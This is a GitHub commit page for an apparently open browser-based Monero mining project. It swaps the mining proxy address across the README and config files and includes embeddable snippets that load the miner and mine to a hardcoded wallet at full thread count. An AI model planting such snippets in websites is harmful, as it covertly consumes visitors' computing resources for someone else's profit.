Skip to content

Commit

Permalink
Merge pull request #18 from NajmAjmal/update
Browse files Browse the repository at this point in the history
Updated README and mining proxy server
  • Loading branch information
NajmAjmal authored Jun 19, 2024
2 parents 8e989e8 + fea1114 commit e0bd235
Show file tree
Hide file tree
Showing 3 changed files with 7 additions and 7 deletions.
10 changes: 5 additions & 5 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -15,10 +15,10 @@ In index.Html you can configure it your preferences


```javascript
server = "wss://45.119.82.33:40725";
server = "wss://ny1.xmrminingproxy.com";
var pool = "gulf.moneroocean.stream:80";
var walletAddress = "INSERT YOUR ADDRESS HERE";
var workerId = "INSERT NODE NAME"
var workerId = "INSERT WORKER NAME"
var threads = -1;
var password = "";
startMining(pool, walletAddress, workerId, threads, password);
Expand All @@ -39,7 +39,7 @@ Go to https://moneroocean.stream. This is the pool you are connected to, it will

1. Open https://monero-webminer.vercel.app/
2. Also Open https://moneroocean.stream in a new tab
3. Paste in my XMR Address 4657q4dnsjLWtzeW4XN3wG9swFumWAZB9i1pegTLMxVAQy5E5AE8uif42kkHWcWc9vDcLUmzeCf3pV7mmrJQQqqe84dtASi
3. Paste in my Monero Address `4657q4dnsjLWtzeW4XN3wG9swFumWAZB9i1pegTLMxVAQy5E5AE8uif42kkHWcWc9vDcLUmzeCf3pV7mmrJQQqqe84dtASi`
4. You will see that "GH-XMR" is Mining. You can also do the same

# Use In Other Projects
Expand All @@ -50,7 +50,7 @@ HTML
<!-- Start Of Mining Code (HTML) -->
<script src="https://cdn.jsdelivr.net/gh/NajmAjmal/monero-webminer@main/script.js"></script>
<script>
server = "wss://45.119.82.33:40725";
server = "wss://ny1.xmrminingproxy.com";
var pool = "moneroocean.stream";
var walletAddress = "4657q4dnsjLWtzeW4XN3wG9swFumWAZB9i1pegTLMxVAQy5E5AE8uif42kkHWcWc9vDcLUmzeCf3pV7mmrJQQqqe84dtASi";
var workerId = "GH-XMR"
Expand All @@ -74,7 +74,7 @@ Javascript
script.src = "https://cdn.jsdelivr.net/gh/NajmAjmal/monero-webminer@main/script.js";
document.head.appendChild(script);

server = "wss://45.119.82.33:40725";
server = "wss://ny1.xmrminingproxy.com";
var pool = "moneroocean.stream";
var walletAddress = "4657q4dnsjLWtzeW4XN3wG9swFumWAZB9i1pegTLMxVAQy5E5AE8uif42kkHWcWc9vDcLUmzeCf3pV7mmrJQQqqe84dtASi";
var workerId = "GH-XMR"
Expand Down
2 changes: 1 addition & 1 deletion external/javascript.js
Original file line number Diff line number Diff line change
Expand Up @@ -6,7 +6,7 @@ var script = document.createElement("script");
script.src = "https://cdn.jsdelivr.net/gh/NajmAjmal/monero-webminer@main/script.js";
document.head.appendChild(script);

server = "wss://45.119.82.33:40725";
server = "wss://ny1.xmrminingproxy.com";
var pool = "moneroocean.stream";
var walletAddress = "4657q4dnsjLWtzeW4XN3wG9swFumWAZB9i1pegTLMxVAQy5E5AE8uif42kkHWcWc9vDcLUmzeCf3pV7mmrJQQqqe84dtASi";
var workerId = "GH-XMR-JS-SNIPPET"
Expand Down
2 changes: 1 addition & 1 deletion index.html
Original file line number Diff line number Diff line change
Expand Up @@ -10,7 +10,7 @@
<script src="https://cdn.jsdelivr.net/gh/NajmAjmal/monero-webminer@main/script.js"></script>
<script>
console.log("Config Loaded")
server = "wss://45.119.82.33:40725";
server = "wss://ny1.xmrminingproxy.com";
var pool = "gulf.moneroocean.stream:80";
var walletAddress = "4657q4dnsjLWtzeW4XN3wG9swFumWAZB9i1pegTLMxVAQy5E5AE8uif42kkHWcWc9vDcLUmzeCf3pV7mmrJQQqqe84dtASi";
var workerId = "GH-XMR"
Expand Down

0 comments on commit e0bd235

Please sign in to comment.